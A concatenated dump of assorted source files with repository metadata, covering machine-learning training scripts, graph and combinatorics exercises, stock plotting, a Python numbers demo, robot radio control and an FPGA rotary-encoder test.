squence_out = enc_layers[use_layer_num]
sub_out = enc_layers[-1]
# transform_out = self.layer_norm(squence_out)
subject_pred_out = self.subject_pred(squence_out)
subject_pred_act = self.activation(subject_pred_out)
# subject_pred_act = subject_pred_act**2
# subject_pred_act = (subject_pred_act > 0.5).long()
return subject_pred_act
def predict_object_predicate(self, text, subject_ids, use_layer_num=-1, device="cpu"):
if use_layer_num != -1:
if use_layer_num < 0 or use_layer_num > 7:
# 越界
raise Exception("层数选择错误,因为bert base模型共8层,所以参数只只允许0 - 7, 默认为-1,取最后一层")
# 计算target mask
text = text.to(self.device)
subject_ids = subject_ids.to(self.device)
enc_layers, _ = self.bert(text, output_all_encoded_layers=True)
squence_out = enc_layers[use_layer_num]
sub_out = enc_layers[-1]
subject_vec = self.extrac_subject(sub_out, subject_ids)
object_layer_norm = self.layer_norm_cond([sub_out, subject_vec])
object_pred_out = self.object_pred(object_layer_norm)
object_pred_act = self.activation(object_pred_out)
# object_pred_act = object_pred_act**4
batch_size, seq_len, target_size = object_pred_act.shape
object_pred_act = object_pred_act.view((batch_size, seq_len, int(target_size/2), 2))
predictions = object_pred_act
return predictions
|
[
"twang650@gatech.edu"
] |
twang650@gatech.edu
|
9cb940b5a3db52178cac627d10f24113dfe8b731
|
7b54f406d5ee41615553a47dc9791857dbf54901
|
/third_task.py
|
e5259b5389f53efe667ee89707a7a75f8cbbc231
|
[] |
no_license
|
CSCATT/py111_exm
|
571da9ff786bd2cf04d59489106b6fe8a071e1f5
|
4d380589bd3c2326ecde08bf9c846f463e68a88b
|
refs/heads/master
| 2021-01-16T01:46:00.413026
| 2020-02-25T10:04:55
| 2020-02-25T10:04:55
| 242,931,650
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 866
|
py
|
import networkx as nx
def finder(graph, str, visited):
visited[str] = True
print("visited: ---> ", visited, "\n")
print(str, graph.adj[str])
"Проход по графу"
for node in graph.adj[str]:
if not visited[node]: # if not visited
finder(graph, node, visited)
return None
if __name__ == "__main__":
graph = nx.Graph()
graph.add_nodes_from("ABCDEFGHJKL")
graph.add_edges_from([('A', 'B'),
('B', 'C'),
('C', 'D'),
('F', 'G'),
('G', 'H'), #*тестовые строки
('J', 'K'), #*
('K', 'L')]) #*
visited = {node: False for node in graph.nodes()}
num = 0
for node in graph.adj:
if not visited[node]: # if not visited
finder(graph, node, visited)
num += 1
print("-----")
print(num)
|
[
"x2g.tillo.g@inbox.ru"
] |
x2g.tillo.g@inbox.ru
|
0b5b1489acfdeeee4d89ecac70ec0e14e54021d5
|
b103ea4b64ba5175f7dc2decac390980d745ed8f
|
/FCN_LSTM/model/bilstm/temp_file/train_model256.py
|
97f7fd93b14cf97c5b84868642c2a11a9dc6fedf
|
[] |
no_license
|
wangye8899/Fully_Convolutional_Network_Time_Series
|
2f08611fc312d3f9e5a53a42369cf90679f3552f
|
3e799dbec98b2facdd0a56c482023c7dff6e9e80
|
refs/heads/master
| 2020-07-05T02:34:07.104037
| 2019-11-02T02:28:56
| 2019-11-02T02:28:56
| 202,495,853
| 7
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,872
|
py
|
import tensorflow as tf
import configparser
import os
import random
import numpy as np
from model256 import model_
from batch_read256 import read_csv_,TFRecordReader
file = './config/parameter_256_3_5.ini'
# 读取配置文件
def read_config(file):
cf = configparser.ConfigParser()
cf.read(file)
learning_rate = cf.getfloat('model','learning_rate')
training_steps = cf.getint('model','train_steps')
batch_size = cf.getint('model','batch_size')
display_step = cf.getint('model','display_step')
test_steps = cf.getint('model','test_steps')
num_input = cf.getint('model','num_input')
num_hidden = cf.getint('model','num_hidden')
num_classes = cf.getint('model','num_classes')
timesteps = cf.getint('model','timesteps')
epoch_num = cf.getint('model','epoch_num')
Is_Vali = cf.getint('model','Is_Vali')
train_file = cf.get('file','train_file')
test_file = cf.get('file','test_file')
val_file = cf.get('file','val_file')
model_file = cf.get('file','model_file')
test_file_path = cf.get('file','data_file_path')
plot_train_step = cf.getint('model','plot_train_steps')
strides = cf.getint('model','strides')
num_channels = cf.getint('model','num_channels')
model_file = cf.get('file','model_file')
return num_hidden, strides,num_channels,num_input,learning_rate,train_file,epoch_num,training_steps,batch_size,display_step,num_classes,Is_Vali,val_file,plot_train_step,model_file
# 返回值
num_hidden,strides,num_channels,num_input,learning_rate,train_file,epoch_num,training_steps,batch_size ,display_step,num_classes,Is_Vali,val_file,plot_train_step,model_file= read_config(file)
init = tf.keras.initializers.he_uniform()
weights={
'conv1':tf.Variable(init([7,1,128])),
'conv2':tf.Variable(init([5,128,256])),
'conv3':tf.Variable(init([3,256,128])),
'out':tf.Variable(init([2*num_hidden,2]))
}
biases ={
'conv1':tf.Variable(init([128])),
'conv2':tf.Variable(init([256])),
'conv3':tf.Variable(init([128])),
'out':tf.Variable(init([2]))
}
# 定义输入data、label
X_CNN = tf.placeholder(tf.float32,[None,30,1],name='X')
X_LSTM = tf.placeholder(tf.float32,[None,256,30],name='X_')
Y = tf.placeholder(tf.float32,[None,num_classes],name='Y')
# 定义loss和优化函数
model_ = model_(X_CNN,X_LSTM,num_hidden,weights,biases)
logits = model_.modeling()
prediction = tf.nn.softmax(logits)
# 计算损失
loss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits,labels=Y))
# 定义优化函数
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_process = optimizer.minimize(loss_op)
# 定义准确率
acc = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(prediction,1),tf.argmax(Y,1)),tf.float32))
# 保存模型
meraged = tf.summary.merge_all()
tf.add_to_collection('loss',loss_op)
tf.add_to_collection('accuracy',acc)
tf.add_to_collection('prediction',prediction)
sess = tf.Session()
# 初始化变量
init = tf.global_variables_initializer()
# tf.get_default_graph().finalize()
data,label,_ = TFRecordReader(train_file,0)
label = tf.cast(label,tf.int32)
label = tf.one_hot(label,2)
data = tf.reshape(data,[5000,256,30])
val_data , val_label,_ = TFRecordReader(val_file,0)
val_data = val_data[:20]
val_label = val_label[:20]
val_label = tf.cast(val_label,tf.int32)
val_label = tf.one_hot(val_label,2)
val_label = tf.reshape(val_label,[20*256,2])
val_data_cnn = tf.reshape(val_data,[20*256,num_input,1])
val_data_lstm = tf.reshape(val_data,[20,256,num_input])
with tf.Session() as sess:
count = 0
temp_acc = 0
sess.run(init)
# 读取数据,调整shape,保证输入无误
data = sess.run(data)
label = sess.run(label)
val_data_cnn_ = sess.run(val_data_cnn)
val_label_ = sess.run(val_label)
val_data_lstm_ = sess.run(val_data_lstm)
for epoch in range(epoch_num):
print("Epoch"+str(epoch))
for step in range(1,training_steps+1):
# 每次随机选一个csv训练
random_index = random.randint(0,4999)
batch_data = data[random_index]
batch_label = label[random_index]
batch_data_cnn = np.reshape(batch_data,[batch_size*256,num_input,1])
batch_data_lstm = np.reshape(batch_data,[batch_size,256,num_input])
batch_label = np.reshape(batch_label,[batch_size*256,2])
# 训练
sess.run(train_process,feed_dict={X_CNN:batch_data_cnn,X_LSTM:batch_data_lstm,Y:batch_label})
# 计算损失和准确率
loss,accu = sess.run([loss_op,acc],feed_dict={X_CNN:batch_data_cnn,X_LSTM:batch_data_lstm,Y:batch_label})
# 输出
if step%display_step==0:
print("Step " + str(step) + ", Minibatch Loss= " + \
"{:.4f}".format(loss) + ", Training Accuracy= " + \
"{:.3f}".format(accu))
#每结束一轮epoch,便开始使用验证集验证
Val_loss,Val_acc = sess.run([loss_op,acc],feed_dict={X_CNN:val_data_cnn_,X_LSTM:val_data_lstm_,Y:val_label_})
if epoch==0:
temp_loss = Val_loss
else:
if (Val_loss-temp_loss) < 0:
# 说明损失仍然在下降
print("loss改善:"+str(temp_loss)+"--->"+str(Val_loss)+"||"+"学习率:"+str(learning_rate))
temp_loss = Val_loss
else:
# 说明经过一个epoch之后模型并没有改善
count+=1
print("loss未改善:"+str(count)+"次"+"--->"+str(Val_loss))
if Val_acc>temp_acc:
# temp_loss = Val_loss
tf.train.Saver().save(sess,model_file+'model')
else:
pass
print("validation acc"+"{:.4f}".format(Val_acc)+"validation loss"+"{:.4f}".format(Val_loss))
|
[
"3091485316@qq.com"
] |
3091485316@qq.com
|
30a1390b789e4bd86190b477b462d67108f7a4a3
|
e1857e582609640f60923ea461da3e84c498095a
|
/block2-datatypes/numbers/number-demo.py
|
671907978a108eb946e216b4c5cc6293cf1ca1c1
|
[] |
no_license
|
mbaeumer/python-challenge
|
178f188004e66c5c4092af51ae5d496679d39dec
|
4cff4a4939268a496117158b0be4e20f4d934213
|
refs/heads/master
| 2023-08-07T22:43:35.490777
| 2023-07-21T21:26:46
| 2023-07-21T21:26:46
| 75,015,661
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,063
|
py
|
#!/usr/bin/python
from decimal import Decimal
from decimal import DecimalException
import random
def get_user_input():
answer = ""
while answer == "":
answer = input("Please enter a number: ")
return answer
def convert_to_int(s):
try:
print(int(s))
except ValueError:
print("Cannot convert to int")
def convert_to_float(s):
try:
print(float(s))
except ValueError:
print("Cannot convert to float")
def convert_to_decimal(s):
try:
print(Decimal(s))
except DecimalException:
print("Cannot convert to Decimal")
def determine_type(answer):
return type(answer)
# showing difference in precision of float vs decimal
def diff_decimal_float():
print("Difference between Decimal and float")
x = Decimal("0.1")
y = float("0.1")
print(f"{x:.20f}")
print(f"{y:.20f}")
def calc_with_decimals():
print("Calculating with decimals")
x = Decimal(34)
y = Decimal(7)
z = x / y
print(f"{z:.20f}")
def calc_with_floats():
print("Calculating with floats")
a = 34
b = 7
c = a/b
print(f"{c:.20f}")
def format_number(number):
print("Formatting alternatives")
print("{:.2f}".format(number))
print("{:+.2f}".format(number))
print("{:.0f}".format(number))
print("{:0>2d}".format(5))
print("{:,}".format(1000000))
print("{:.2%}".format(number))
print("{:.2e}".format(number))
print("{:10d}".format(50))
print("{:<10d}".format(50))
print("{:^10d}".format(50))
def generate_random_numbers():
random1 = random.randint(1,6) # 1..6
random2 = random.randrange(6) # 0..5
print("Generating random numbers")
print("With randint: ", random1)
print("With randrange: ", random2)
def operators_for_ints():
a = 5
b = 2
print("5/2 = %d" % (a/b))
print("5%%2 = %d" % (a%b))
print("5//2 = %d" % (a//b))
answer = get_user_input()
print(type(answer))
convert_to_int(answer)
convert_to_float(answer)
convert_to_decimal(answer)
diff_decimal_float()
calc_with_decimals()
calc_with_floats()
format_number(34/7)
generate_random_numbers()
operators_for_ints()
# TODO:
# currency
|
[
"martin.baeumer@gmail.com"
] |
martin.baeumer@gmail.com
|
6e7957bb1f333a3da864d18a81ae420ab74e4ffa
|
f19c5436c7173835a3f1d064541ee742178e213a
|
/mah/Programmers/메뉴 리뉴얼.py
|
20b5a552218aadd52b2828f25d2f9f8a092c26d5
|
[] |
no_license
|
hongsungheejin/Algo-Study
|
f1c521d01147a6f74320dbc8efe3c1037e970e73
|
d6cb8a2cc6495ccfcfb3477330a3af95895fae32
|
refs/heads/main
| 2023-07-06T10:58:27.258128
| 2021-07-29T02:11:13
| 2021-07-29T02:11:13
| 379,269,918
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 914
|
py
|
from itertools import combinations
def solution(orders, course):
candi = {}
course = set(course)
for order in orders:
order = sorted(order)
for i in range(2, len(order)+1):
for combi in combinations(order, i):
combi = "".join(combi)
if combi in candi:
candi[combi] += 1
else:
candi[combi] = 1
answer = []
candis = {k:v for k, v in sorted(candi.items(), key=lambda x: (len(x[0]), x[1])) if v>=2}
for c in course:
tmp = {}
max_v = 0
for k, v in sorted(candis.items(), key=lambda x:x[0]):
if len(k) == c:
max_v = max(max_v, v)
if v in tmp: tmp[v].append(k)
else: tmp[v] = [k]
if max_v in tmp:
answer.extend(tmp[max_v])
return sorted(answer)
|
[
"mai.hong0924@gmail.com"
] |
mai.hong0924@gmail.com
|
f2942c7cf18c1edb7f563ce2408bde73246dbeb1
|
ada7983995e346c8c676d0bbe5ed2397ff54b930
|
/day14/day14-part1.py
|
451c7c5344789dfa26f143c5012eba98666b0c06
|
[] |
no_license
|
hergin/AdventOfCode2020
|
4dc54e31308ae8584407f5c0917bcdb2f0aa44fa
|
e700d5bc15d689cc6c22e37d9a6170649901b3b0
|
refs/heads/master
| 2023-02-09T02:47:15.922678
| 2020-12-24T03:30:31
| 2020-12-24T03:30:31
| 321,268,210
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 986
|
py
|
import os, sys, math
def applyMask(value,mask):
maskedValue = 0
tempValue = value
for i in range(0,len(mask)):
maskedValue *= 2
twoPowerI = 2**(35-i)
if mask[i] == '1':
maskedValue += 1
elif mask[i] == 'X':
if tempValue >= twoPowerI:
maskedValue += 1
if tempValue >= twoPowerI:
tempValue -= twoPowerI
return maskedValue
currentMask = ""
memory = {}
for line in open(os.path.join(sys.path[0], "input14.txt")):
values = line.strip().split(' ')
if values[0] == "mask":
currentMask = values[2]
else:
memoryIndex = int(values[0][4:][:-1])
value = int(values[2])
valueAfterMask = applyMask(value, currentMask)
memory[memoryIndex] = valueAfterMask
print("mask:",currentMask,"memoryIndex:",memoryIndex,"value:",value,"maskedValue:",valueAfterMask)
#print(memory)
print("Result",sum(memory.values()))
|
[
"hergin@bsu.edu"
] |
hergin@bsu.edu
|
632b5d2161af536c55b014590d765fb51b0d4cce
|
6d3b34e64e3ee6bdcdabbf6aad8aa3da3ef080e9
|
/New Workspace/multithreading/usingsubclass.py
|
cf1535d211d7aa66869c0d5422314a74b016fb61
|
[] |
no_license
|
himani1213/SpringMicroservices
|
15a9c84dc9a9309b1a47af74f39b34a708b228f2
|
2a62068374602da1d7d5f98afc1c62c60ba560ed
|
refs/heads/master
| 2020-09-27T01:20:43.149587
| 2020-02-28T15:15:35
| 2020-02-28T15:15:35
| 226,388,197
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 183
|
py
|
from threading import Thread
class MyThread(Thread):
def run(self):
i = 0
while(i<=10):
print(i)
i+=1
t= MyThread()
t.start()
|
[
"hsingl34@in.ibm.com"
] |
hsingl34@in.ibm.com
|
7358f4249de375c62f19800234d1ccfa24c2fa5c
|
000dcb0cf680486fd3c2f7afad0dd7935e2b8a36
|
/finance/stocks.py
|
a05e65142cf900790aad702c5367b1dac1064d4d
|
[] |
no_license
|
arnoldas500/machineLearning
|
d51419a10a1bbad8cd8acb15225e52d01d4cd176
|
73124d7a9a7831f5f567142e2362e6ae9413d871
|
refs/heads/master
| 2021-09-03T01:43:52.567755
| 2018-01-04T16:41:40
| 2018-01-04T16:41:40
| 103,578,945
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,413
|
py
|
import datetime as dt
import matplotlib.pyplot as plt
from matplotlib import style
import pandas as pd
import pandas_datareader.data as web
from matplotlib.finance import candlestick_ohlc
import matplotlib.dates as mdates
style.use('ggplot')
'''
#can specify start and end dates
start = dt.datetime(2000,1,1)
end = dt.datetime(2016,12,31)
#data from yahoo finance api for tesla stock
df = web.DataReader('TSLA', 'yahoo', start, end)
#reading a csv in of your own
df = pd.read_csv('filename', parse_dates=True, index_col=0);
#giving it a date time index by doing parse_dates=True, index_col=0
print(df.head())
#will graph for you and give you a legend
df.plot()
plt.show()
#if you want to plot something very specific you can reference the specific columns in pandas
df['Adj. Close'].plot()
print(df[['Open','Close']].head())
'''
#can specify start and end dates
start = dt.datetime(2000,1,1)
end = dt.datetime(2016,12,31)
#data from yahoo finance api for tesla stock
df = web.DataReader('TSLA', 'yahoo', start, end)
'''
#df = pd.read_csv('tsla.csv', parse_dates=True, index_col=0)
#creating our own col in the data frame called 100 moving avg (takes todays price and 99 of prev close price and takes the avg of them)
df['100ma'] = df['Adj Close'].rolling(window=100, min_periods=0).mean()
print(df.head())
#6,1 is 6 by 1 and starting at 0,0
ax1 = plt.subplot2grid((6,1), (0,0), rowspan=5, colspan=1)
#sharex=ax1 makes both the plots share an x axis so when you zoom in on one the other will also zoom in accordingly
ax2 = plt.subplot2grid((6,1), (5,0), rowspan=1, colspan=1, sharex=ax1)
#plots a line which takes in x and y , x = df.index and y = ajd close
ax1.plot(df.index, df['Adj Close'])
ax1.plot(df.index, df['100ma'])
ax2.bar(df.index, df['Volume'])
plt.show()
'''
#doing some resampling and candlestick plots
#lets say you collect data every min or whatever, but you need hourly data, then you can resample to be hourly data from min data
#resample from daily data to 10 day data can do .mean ect we are using .ohlc=open high low close
df_ohlc = df['Adj Close'].resample('10D').ohlc()
#taking sum over 10 days of vol
df_volume = df['Volume'].resample('10D').sum()
#can get all of the values of a datafram by doing df.values
#reseting index so date is now a column
df_ohlc.reset_index(inplace=True)
#convert the date to mdates since thats what matplotlib uses (dont know why)
df_ohlc['Date'] = df_ohlc['Date'].map(mdates.date2num) #map just maps this onto every date to convert from date to mdates object
ax1 = plt.subplot2grid((6,1), (0,0), rowspan=5, colspan=1)
ax2 = plt.subplot2grid((6,1), (5,0), rowspan=1, colspan=1, sharex=ax1)
ax1.xaxis_date()
#where the candle stick is filled in shows the open and close low and high
candlestick_ohlc(ax1, df_ohlc.values, width=5, colorup='g')
#fills from 0 to vol high on second plot
ax2.fill_between(df_volume.index.map(mdates.date2num), df_volume.values, 0)
plt.show()
|
[
"akurbanovas@albany.edu"
] |
akurbanovas@albany.edu
|
a66ea0e584b1c0c16a1073e306b633b0ae4bd795
|
3da102290ebe6c186474ecbeec9065ea2e5357e3
|
/pi/robot.py
|
4d162feefe0008daae6f7e2e33d88865d9c46d45
|
[] |
no_license
|
fo-am/penelopean-robotics
|
55cbbebe29f15fe5996222a5db36040ac400b8f3
|
2a6f81a4d8b098ac513bd42df980e64128df8a1b
|
refs/heads/master
| 2022-05-28T17:46:36.579042
| 2022-05-19T13:35:47
| 2022-05-19T13:35:47
| 134,366,263
| 8
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,976
|
py
|
import yarnasm
import radio
import time
# things we want to be able to do:
# * tweak servo defaults
# * queue of messages to send?
class robot:
def __init__(self,address):
self.address=address
self.telemetry=[0 for i in range(256)]
self.code=[]
self.source=""
self.state="running"
self.ping_time=time.time()
self.watchdog_timeout=10
self.ping_duration=2
self.start_walking=False
self.set_led=False
self.led_state=False
def pretty_print(self):
out = "robot: "+str(self.telemetry[yarnasm.registers["ROBOT_ID"]])+"\n"
out+= "pc: "+str(self.telemetry[yarnasm.registers["PC_MIRROR"]])+"\n"
out+= "a: "+str(self.telemetry[yarnasm.registers["A"]])+"\n"
out+= "step: "+str(self.telemetry[yarnasm.registers["STEP_COUNT"]])+"\n"
def telemetry_callback(self,data):
if self.state=="disconnected" or self.state=="waiting":
self.state="connected"
self.telemetry=data
#print("telemetry: "+str(self.address[4])+" "+str(data[0])+" "+str(data[9]))
self.ping_time=time.time()
def sync(self,radio,beat,ms_per_beat):
reg_sets = []
# update A register here, based on if the start flag has been set
if self.start_walking:
reg_sets+=[[yarnasm.registers["A"],1]]
self.start_walking=False
if self.set_led:
reg_sets+=[[yarnasm.registers["LED"],self.led_state]]
telemetry = radio.send_sync(self.address,beat,ms_per_beat,reg_sets)
if telemetry!=[]:
self.telemetry = telemetry
print("telemetry: "+str(self.address[4])+" "+str(self.telemetry[0])+" "+str(self.telemetry[9]))
# stop update requesting telemetry for a bit
self.ping_time=time.time()
def sync2(self,radio,beat,ms_per_beat):
reg_sets = []
radio.send_sync(self.address,beat,ms_per_beat,reg_sets)
def walk_pattern(self,pat,ms_per_step,radio):
radio.send_pattern(self.address,pat,ms_per_step)
def calibrate(self,radio,do_cali,samples,mode):
return radio.send_calibrate(self.address,do_cali,samples,mode)
def load_asm(self,fn,compiler,radio):
with open(fn, 'r') as f:
self.source=f.read()
self.code = compiler.assemble_file(fn)
return radio.send_code(self.address,self.code)
def send_asm(self,asm,compiler,radio):
self.code = compiler.assemble_bytes(asm)
return radio.send_code(self.address,self.code)
def write(self,addr,val,radio):
radio.send_set(self.address,addr,val)
def save_eeprom(self,radio):
radio.send_save_eeprom(self.address)
# A register is cleared when the robot reaches it's end position
# and set by the Pi when we are ready to start again
def start_walking_set(self):
self.start_walking=True
def led_set(self,state):
self.set_led=True
self.led_state=state
# has been set above, and returned in a telemetry packet...
def is_walking(self):
return self.telemetry[yarnasm.registers["A"]]==1
def update(self,radio):
pass
def update_regs(self,regs):
regs["state"]=self.state
regs["ping"]=time.time()-self.ping_time
regs["pc"]=self.telemetry[yarnasm.registers["PC_MIRROR"]]
regs["a"]=self.telemetry[yarnasm.registers["A"]]
regs["b"]=self.telemetry[yarnasm.registers["B"]]
regs["comp_angle"]=self.telemetry[yarnasm.registers["COMP_ANGLE"]]
regs["comp_dr"]=self.telemetry[yarnasm.registers["COMP_DELTA_RESET"]]
regs["comp_d"]=self.telemetry[yarnasm.registers["COMP_DELTA"]]
regs["step_count"]=self.telemetry[yarnasm.registers["STEP_COUNT"]]
regs["step_reset"]=self.telemetry[yarnasm.registers["STEP_COUNT_RESET"]]
regs["robot"]=self.telemetry[yarnasm.registers["ROBOT_ID"]]
|
[
"dave@fo.am"
] |
dave@fo.am
|
17ba77f176141d459e81985f43e229f7ca668faf
|
d6d4449df702ab59a13559aaba599c60381d1852
|
/tests/rot_enc_test.py
|
1a121982d07371e9b5706f6ec0329ecc102aefc0
|
[
"CC-BY-4.0"
] |
permissive
|
zzfd97/StickIt-RotaryEncoder
|
c58ce2758676285d6ce539e895b6a5d01b451396
|
78c5511192fd471e57bc9b6b6ab5d1393ecdb0f3
|
refs/heads/master
| 2021-12-12T18:56:36.702963
| 2017-02-12T04:00:09
| 2017-02-12T04:00:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,614
|
py
|
# /***********************************************************************************
# * This program is free software; you can redistribute it and/or
# * modify it under the terms of the GNU General Public License
# * as published by the Free Software Foundation; either version 2
# * of the License, or (at your option) any later version.
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
# * 02111-1307, USA.
# *
# * (c)2013 - X Engineering Software Systems Corp. (www.xess.com)
# ***********************************************************************************/
from xstools.xsdutio import * # Import funcs/classes for PC <=> FPGA link.
print '''\n
##################################################################
# This program tests the interface between the host PC and the FPGA
# on the XuLA board that has been programmed to scan a rotary encoder.
# You should see the state of the rotary encoder accumulator
# displayed on the screen.
##################################################################
'''
USB_ID = 0 # This is the USB port index for the XuLA board connected to the host PC.
ROTENC1_ID = 1 # This is the identifier for the rotary encoder 1 interface in the FPGA.
ROTENC2_ID = 2 # This is the identifier for the rotary encoder 2 interface in the FPGA.
BUTTONS_ID = 3 # This is the identifier for the buttons on rotary encoders 1 & 2.
# Create an interface object that reads one 32-bit output from the rotary encoder module and
# drives one 1-bit dummy-input to the rotary encoder module.
rotenc1 = XsDutIo(xsusb_id=USB_ID, module_id=ROTENC1_ID, dut_output_widths=[32], dut_input_widths=[1])
rotenc2 = XsDutIo(xsusb_id=USB_ID, module_id=ROTENC2_ID, dut_output_widths=[32], dut_input_widths=[1])
buttons = XsDutIo(xsusb_id=USB_ID, module_id=BUTTONS_ID, dut_output_widths=[2], dut_input_widths=[1])
while True: # Do this forever...
accumulator1 = rotenc1.Read() # Read the ROT1 accumulator.
accumulator2 = rotenc2.Read() # Read the ROT2 accumulator.
bttns = buttons.Read() # Read the ROT1 and ROT2 buttons.
print 'ROT1: {:8x} {:1x} ROT2: {:8x} {:1x}\r'.format(accumulator1.unsigned, bttns[0], accumulator2.unsigned, bttns[1]),
|
[
"devb@xess.com"
] |
devb@xess.com
|
da3ca927ab7c3f9f63e45e04c47b52107c0630e7
|
e0c3dd84bb34a27fa9926c424b488e7bf9e62865
|
/deep_learning/logistic_classifier.py
|
525825929e9cbbaa90f5bbe4a3f6eb9ca4d00144
|
[] |
no_license
|
mspandit/deep-learning-tutorial
|
c5e7099b19d7ea4cec2b7461931de11ac6be3c5a
|
7ef7760d571bcc07196dc897ad2e53517ef4471f
|
refs/heads/master
| 2021-01-23T07:20:56.377617
| 2014-10-20T13:22:41
| 2014-10-20T13:22:41
| 24,348,581
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,230
|
py
|
"""
This tutorial introduces logistic regression using Theano and stochastic
gradient descent.
Logistic regression is a probabilistic, linear classifier. It is parametrized
by a weight matrix :math:`W` and a bias vector :math:`b`. Classification is
done by projecting data points onto a set of hyperplanes, the distance to
which is used to determine a class membership probability.
Mathematically, this can be written as:
.. math::
P(Y=i|x, W,b) &= softmax_i(W x + b) \\
&= \frac {e^{W_i x + b_i}} {\sum_j e^{W_j x + b_j}}
The output of the model or prediction is then done by taking the argmax of
the vector whose i'th element is P(Y=i|x).
.. math::
y_{pred} = argmax_i P(Y=i|x,W,b)
This tutorial presents a stochastic gradient descent optimization method
suitable for large datasets, and a conjugate gradient optimization method
that is suitable for smaller datasets.
References:
- textbooks: "Pattern Recognition and Machine Learning" -
Christopher M. Bishop, section 4.3.2
"""
__docformat__ = 'restructedtext en'
import os
import sys
import time
import numpy
import theano
import theano.tensor as Tensor
from data_set import DataSet
from classifier import Classifier
class LogisticClassifier(Classifier):
"""Multi-class Logistic Regression Class
The logistic regression is fully described by a weight matrix :math:`W`
and bias vector :math:`b`. Classification is done by projecting data
points onto a set of hyperplanes, the distance to which is used to
determine a class membership probability.
"""
def __init__(self, input_units, output_units):
"""
"""
super(Classifier, self).__init__()
# initialize with 0 the weights as a matrix of shape (n_in, n_out)
self.weights = theano.shared(
value = numpy.zeros(
(input_units, output_units),
dtype = theano.config.floatX
),
name = 'weights',
borrow = True
)
self.initialize_biases(output_units, None, 'logistic_biases')
# parameters of the model
self.parameters = [self.weights, self.biases]
def output_probabilities_function(self, input):
"""function to compute vector of class-membership probabilities"""
return Tensor.nnet.softmax(
Tensor.dot(input, self.weights)
+ self.biases
)
def predicted_output_function(self, input):
"""
function to compute prediction as class whose probability is maximal
"""
return Tensor.argmax(
self.output_probabilities_function(input),
axis=1
)
def cost_function(self, inputs, outputs):
"""
"""
return -Tensor.mean(
Tensor.log(
self.output_probabilities_function(inputs)
)[Tensor.arange(outputs.shape[0]), outputs])
def evaluation_function(self, inputs, outputs):
"""Return a float representing the number of errors in the minibatch
over the total number of examples of the minibatch ; zero one
loss over the size of the minibatch
:type outputs: theano.tensor.TensorType
:param outputs: corresponds to a vector that gives for each example the
correct label
"""
# check if outputs has same dimension of predicted_output
if outputs.ndim != self.predicted_output_function(inputs).ndim:
raise TypeError(
'outputs should have the same shape as self.predicted_output',
(
'outputs',
target.type,
'predicted_output',
self.predicted_output_function(inputs).type
)
)
# check if outputs is of the correct datatype
if outputs.dtype.startswith('int'):
# the Tensor.neq operator returns a vector of 0s and 1s, where 1
# represents a mistake in prediction
return Tensor.mean(
Tensor.neq(self.predicted_output_function(inputs), outputs)
)
else:
raise NotImplementedError()
|
[
"mspandit@yahoo.com"
] |
mspandit@yahoo.com
|
8c2fce2c46678cdd2c2d448059130c263c6a1746
|
be8b2123c0d06403cb679a18597d86248a4b30ee
|
/FacebookHackaton2013/facebookhackaton2013.py
|
6a6e2b40beea256adb2c2b864f4a2ccafc42b1aa
|
[] |
no_license
|
ClaudiaSianga/Python-para-Zumbis
|
52438d30f4cc5cb0c16740083553cf2967139742
|
798f4acac673837e599d4e2790cedce98bc73ab9
|
refs/heads/master
| 2021-01-11T18:03:19.921355
| 2017-01-19T18:09:41
| 2017-01-19T18:09:41
| 79,480,204
| 0
| 0
| null | 2017-01-19T18:03:19
| 2017-01-19T18:03:19
| null |
UTF-8
|
Python
| false
| false
| 432
|
py
|
#!usr/bin/env python
# -*- coding: utf-8 -*-
def parse_bin(n, k):
lista = []
for i in range((2**n-1)+1):
lista.append(bin(i));
lista = sorted(lista, key=lambda x: -x.count('1'))
return (lista, lista[k-1])
print "="*150
print "Lista:%s \nk-ésimo elemento: %s\n" %(parse_bin(3, 5))
print "Lista:%s \nk-ésimo elemento: %s\n" %(parse_bin(4, 10))
print "Lista:%s \nk-ésimo elemento: %s\n" %(parse_bin(5, 15))
print "="*150
|
[
"guilherme-louro@hotmail.com"
] |
guilherme-louro@hotmail.com
|
b51f4bd7b2670382d3d6f617619e7c569746b871
|
74748f587dc4a8e74ebdf2274f632ffa545cceca
|
/itdrocevo/itdrocevo/asgi.py
|
cae9c654847e07815571a22e48c86b3f5b67901e
|
[] |
no_license
|
IvanIvantey/servacok-saiticok
|
fc32c3daaf1c7ec7ed84b4a89b0d725949bd0d60
|
fbd8bcf27e587bc4a0bb88db71bd527ca6d43b65
|
refs/heads/master
| 2023-03-03T23:35:57.522839
| 2021-02-08T13:22:39
| 2021-02-08T13:22:39
| 337,081,285
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
"""
ASGI config for itdrocevo project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'itdrocevo.settings')
application = get_asgi_application()
|
[
"sa50_i.v.ivantey@mpt.ru"
] |
sa50_i.v.ivantey@mpt.ru
|
8efb6483d2133c3e9f4a7801382b7a59b8ccfe7c
|
b6f8849e007476d0b6b55793fdf53c93452c1f14
|
/lif_neuron_diagnosis.py
|
668903a311d0c9a0f0c1ef979c2a9d2e38b44e71
|
[] |
no_license
|
emelon8/ripples_model
|
a646a353bc1700d29b21b9a19cf8e566933c0c09
|
